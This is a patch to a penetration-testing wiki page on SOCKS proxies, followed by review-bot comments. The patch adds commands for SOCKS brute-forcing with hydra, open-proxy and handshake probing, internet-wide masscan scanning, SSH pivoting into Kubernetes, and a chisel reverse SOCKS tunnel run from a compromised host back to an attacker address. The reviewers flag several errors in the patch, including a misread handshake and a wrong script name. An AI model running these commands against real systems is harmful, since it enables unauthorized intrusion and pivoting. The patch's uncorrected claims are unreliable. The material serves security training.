From b15c7b8fac108daef68dcd137b22f2283adbdd21 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 20 Dec 2025 08:29:12 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/network-services-pentesting/10... --- src/SUMMARY.md | 1 + .../inputmethodservice-ime-abuse.md | 1 + .../1080-pentesting-socks.md | 75 ++++++++++++++++++- 3 files changed, 74 insertions(+), 3 deletions(-) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index fdf253b1bef..9ac5c0d0b19 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -375,6 +375,7 @@ - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md) + - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md) - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md) - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md) - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md) diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md index 878d498c40e..8251e907770 100644 --- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md +++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md 
@@ -81,3 +81,4 @@ adb shell ime help - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices. - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI). +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/1080-pentesting-socks.md b/src/network-services-pentesting/1080-pentesting-socks.md index d7ec28ee51e..114a177d329 100644 --- a/src/network-services-pentesting/1080-pentesting-socks.md +++ b/src/network-services-pentesting/1080-pentesting-socks.md @@ -4,7 +4,7 @@ ## Basic Information -**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets, operating at the session layer (Layer 5) of the OSI model. +**SOCKS** is a protocol used for transferring data between a client and server through a proxy. The fifth version, **SOCKS5**, adds an optional authentication feature, allowing only authorized users to access the server. It primarily handles the proxying of TCP connections and the forwarding of UDP packets (via the `UDP ASSOCIATE` command), operating at the session layer (Layer 5) of the OSI model. When tooling supports the `socks5h` scheme, DNS resolution is forced through the proxy, preventing local DNS leaks and making it harder to fingerprint the originating host. **Default Port:** 1080 
@@ -42,6 +42,46 @@ PORT STATE SERVICE |_ Performed 1921 guesses in 6 seconds, average tps: 320 ``` +#### Hydra module + +```bash +hydra -L users.txt -P passwords.txt -s 1080 -t 16 -V socks5 +``` + +### Method & open-proxy enumeration + +```bash +nmap -sV --script socks-methods,socks-open-proxy -p 1080 +``` + +`socks-methods` forces the server to list supported authentication types, while `socks-open-proxy` attempts an outbound CONNECT to confirm whether the service can be abused as a relay. + +#### Raw handshake check + +```bash +printf '\x05\x01\x00' | nc -nv 1080 +``` + +A `\x05 01 00` response indicates SOCKS5 offering "no authentication". Any `\x00` followed by `\x02` means username/password is required, which is useful for quickly fingerprinting exposed devices in scripts. + +### Quick egress validation + +```bash +curl --socks5-hostname :1080 https://ifconfig.me +curl --socks5-hostname user:pass@:1080 http://internal.target +``` + +Use `--socks5-hostname` (or `socks5h://` URLs) so DNS resolution happens remotely. Pair it with `proxychains4 -q nmap -sT -Pn --top-ports 200 ` to verify whether the proxy truly provides internal reach. + +### Internet-wide discovery / fingerprinting + +```bash +masscan 0.0.0.0/0 -p1080 --banners --rate 100000 -oX socks.xml +``` + +Feed results back into NSE, `zgrab2`, or custom python scripts to prioritize promising hosts (e.g., banner strings like `3proxy`, `Dante`, `MikroTik`). + + ## Tunneling and Port Forwarding ### Basic proxychains usage 
@@ -64,9 +104,38 @@ With auth socks5 10.10.10.10 1080 username password ``` -#### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md) +Pro tip: switch to `dynamic_chain`, enable `proxy_dns`, and shorten `tcp_read_time_out`/`tcp_connect_time_out` to make brute-force enumeration over latent tunnels far more reliable. -{{#include ../banners/hacktricks-training.md}} +### SSH dynamic SOCKS (cloud / Kubernetes pivoting) +```bash +ssh -D 1080 -q -N attacker@bastion.example +export HTTPS_PROXY=socks5h://127.0.0.1:1080 +kubectl get pods +``` + +Setting `socks5h://` (or `--socks5-hostname` in curl) forces the bastion to resolve cluster hostnames, eliminating local DNS leakage. You can permanently bind the proxy to a specific `kubectl` context with: + +```bash +kubectl config set-cluster --proxy-url=socks5h://127.0.0.1:1080 +``` +### Rapid SOCKS implants for pivoting +```bash +# Attacker +chisel server --reverse --port 9000 --socks5 + +# Compromised target +chisel client attacker_ip:9000 R:socks +``` + +This spawns a reverse SOCKS5 tunnel entirely over a single outbound TCP link, perfect for environments with egress filtering. Combine it with `proxychains` on the attacker side to route RDP/SMB enumeration through the freshly established tunnel. + +#### More info: [Tunneling and Port Forwarding](../generic-hacking/tunneling-and-port-forwarding.md) + +## References + +- [Use a SOCKS5 Proxy to Access the Kubernetes API (Kubernetes Docs, 2024)](https://kubernetes.io/docs/tasks/extend-kubernetes/socks5-proxy-access-api) + +{{#include ../banners/hacktricks-training.md}}
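Review bot: in the `inputmethodservice-ime-abuse.md` hunk (`@@ -81,3 +81,4 @@`), the `+{{#include ../../banners/hacktricks-training.md}}` line is appended directly under the last `- **App-side ...**` bullet with no blank line, whereas the 1080 page in this same patch separates its banner include from the preceding text with an empty `+` line. Without the blank line the include sits on a lazy-continuation line of that list item and the banner can render as part of the bullet; add a blank line before it to match the convention used elsewhere in the repo.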
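Review bot: the new sentence in the `## Basic Information` hunk (`@@ -4,7 +4,7 @@`), "making it harder to fingerprint the originating host", overstates what `socks5h` buys you. The scheme makes the client send the hostname to the proxy (SOCKS5 domain-name address type) instead of resolving it locally, so the concrete benefits are that names only resolvable on the far side (internal DNS) work at all, and that the client's resolver emits no queries for the target names; it does nothing about other host fingerprints. Suggest rewording to something like "so hostnames are resolved by the proxy, which lets you reach names that only resolve from inside and avoids leaking DNS queries from the client". The `UDP ASSOCIATE` addition is correct and a welcome precision.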
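Review bot: the interpretation under `#### Raw handshake check` in the `@@ -42,6 +42,46 @@` hunk is wrong: `\x05\x01\x00` is the client greeting that the `printf` sends (version 5, one method, no-auth), not a server response. The server's method-selection reply is two bytes: `05 00` means no authentication was selected, `05 02` means username/password, and `05 ff` means none of the offered methods is acceptable. Because the greeting offers only method `0x00`, a server that requires username/password will answer `05 ff`, never `05 02`; to actually fingerprint auth requirements offer both methods, e.g. `printf '\x05\x02\x00\x02' | nc -nv <ip> 1080`, and read the second byte. Three further points in the same hunk: (1) I do not find a `socks-methods` script in stock Nmap; the NSE script that enumerates supported authentication methods is `socks-auth-info`, so the `nmap -sV --script socks-methods,socks-open-proxy -p 1080` line should use that name (and confirm `socks-open-proxy` is still the relay check you want). (2) The `hydra`, `nmap`, `nc`, both `curl` and the `proxychains4 -q nmap -sT -Pn --top-ports 200` commands carry no target host as shown; if an angle-bracket placeholder such as `<ip>` was intended, check that it survives rendering, and for the authenticated curl case the documented form is `-x socks5h://user:pass@<ip>:1080` (or `--proxy-user`). (3) `masscan 0.0.0.0/0 -p1080 ...` is an internet-wide scan on a page about pentesting a service; at minimum pair it with `--excludefile` and a sentence that this is only for explicitly authorized scope, and capitalize "python" as "Python".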
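Review bot: `kubectl config set-cluster --proxy-url=socks5h://127.0.0.1:1080` in the `@@ -64,9 +104,38 @@` hunk is missing the required cluster-name positional argument (`kubectl config set-cluster <cluster> --proxy-url=...`); as written kubectl errors out. Also, the Kubernetes page cited under `## References` uses the `socks5://` scheme for this setting, and client-go's kubeconfig validation accepts `http`, `https` and `socks5` as far as I know, so please verify that `socks5h` is accepted there before recommending it (Go's SOCKS5 dialer hands the unresolved hostname to the proxy in either case, so nothing is lost by using `socks5://` in the kubeconfig). Two smaller points: the "Pro tip" that `dynamic_chain` makes enumeration more reliable only applies when several proxies are listed, since with a single hop it behaves like `strict_chain`, and `proxy_dns` is already enabled in the stock proxychains-ng config, so say "keep `proxy_dns` enabled" rather than "enable". For the chisel section, state where the reverse SOCKS listener ends up: with `--reverse` on the server and `R:socks` on the client it opens on the attacker side on port 1080 by default, so the proxychains entry readers need is `socks5 127.0.0.1 1080`, not the `socks5 10.10.10.10 1080` example shown just above it.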